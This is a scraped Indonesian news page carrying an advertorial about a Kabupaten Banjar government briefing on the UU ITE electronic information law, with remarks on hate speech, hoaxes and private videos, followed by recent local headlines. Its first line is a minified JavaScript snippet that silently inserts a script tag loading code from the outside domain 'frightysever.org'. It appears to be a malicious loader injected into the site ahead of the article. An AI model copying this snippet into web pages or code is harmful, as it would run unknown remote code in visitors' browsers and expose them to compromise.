(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Dinas Kominfo Statistik dan Persandian Sosialisasikan UU ITE


MARTAPURA, Dinas Komunikasi Informatika Statistik dan Persandian Kabupaten Banjar menyelenggarakan sosialisasi UU 19/2016 tentang Informasi dan Transaksi Elektronik (ITE) di Aula Kantor Kesatuan Bangsa dan Politik (Kesbangpol), Rabu (1/11) kemarin.

Saat sosialisasi, Farid Soufian, Kepala Dinas Komunikasi, Informatika, Statistik dan Persandian Kabupaten Banjar mengajak masyarakat Kabupaten Banjar bijak dan berhati-hati bermedia sosial.

“Jangan sampai apa yang kita posting di media sosial bermuatan SARA dan ujaran kebencian,” katanya.

Meski begitu, ujar Farid di hadapan para peserta sosialisasi dari perwakilan Satuan Kerja Perangkat Daerah (SKPD) dan kecamatan ini , bukan berarti pula masyarakat takut menyampaikan sebuah informasi, terutama informasi terkait pembangunan di daerah. Sebaliknya, bagi aparatur pemerintah, memberikan informasi pembangunan justru menjadi sebuah kewajiban.

Tentang kegiatan sosialisasi yang dihadiri Bahrom Madji dari Dinas Komunikasi dan Informatika Provinsi Kalsel ini, Cornelius Kristanto, Kabid E Government mengatakan, kegiatan ini bertujuan untuk memberikan pemahaman tentang tata aturan penyampaian informasi elektronik.

Bahrom Madjie di tengah penyampaian materinya mengingatkan untuk tidak mendokumentasikan video-video pribadi karena sangat rentan tersebar.

“Bisa saja HP kita hilang sehingga video-video pribadi kita akan menyebar. Jadi baiknya tidak usah membuat video-video yang sifatnya pribadi dan tidak untuk konsumsi publik,” kata bahrom.

Melanjutkan Bahrom, Kasat Binmas Polres Banjar, AKP Amalia Afifi, yang juga hadir sebagai pemateri menyampaikan, penggunaan dan penanggulangan teknologi terkini dalam menyikapi radikalisme digital, termasuk maraknya kabar yang tak jelas sumbernya, alias hoax.

“Hoax merupakan informasi yang disampaikan seakan benar oleh si pembuat atau si penyebar, padahal mereka sedang berdusta,” ujar mantan Kapolsek Martapura ini.

Di sesi tanya jawab, para peserta banyak mempertanyakan tentang banyaknya peredaran konten-konten pornografi di internet serta langkah pemerintah memblokir situs-situs tersebut. Selain itu, juga dibahas mengenai informasi registrasi ulang kartu SIM pengguna ponsel yang belakangan sedang menjadi topic utama di banyak perbincangan. (rudiyanto/adv)


Desy Arfianty

Recent Posts

Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

KANALKALIMANTAN.COM, BANJARBARU – Srikandi PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B)… Read More

7 menit ago

Bupati dan Wabup Banjar Hadiri Haul Ke-86 Datu Kasyful Anwar

KANALKALIMANTAN.COM, MARTAPURA - Ribuan orang memadati area kubah tempat dilaksanakannya haul ke-86 Tuan Guru KH… Read More

5 jam ago

Lelaki di Banjarmasin Habisi Kakak Ipar, Jasad Dibuang ke Wilayah Kintap

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin mengungkap kasus pembunuhan yang… Read More

5 jam ago

Tingkatkan Capaian Akses Layanan Air Limbah dan Air Minum, Dinas PUPR Kalsel Gelar Workshop

KANALKALIMANTAN.COM, BANJARBARU - Workshop Implementasi Jastrada Air Minum Provinsi Kalsel tahun 2024 di Banjarmasin digelar… Read More

22 jam ago

Ikuti Festival Tunas Bahasa Ibu Nasional di jakarta, Murid SDN Indrasari 2 Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Murid kelas 5 SDN Indrasari 2 Martapura, M Royan bersama guru dan… Read More

22 jam ago

Kafilah HSU Berangkat ke MTQ ke-35 Tingkat Provinsi Kalsel 2024

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan resmi melepas kafilah… Read More

23 jam ago

This website uses cookies.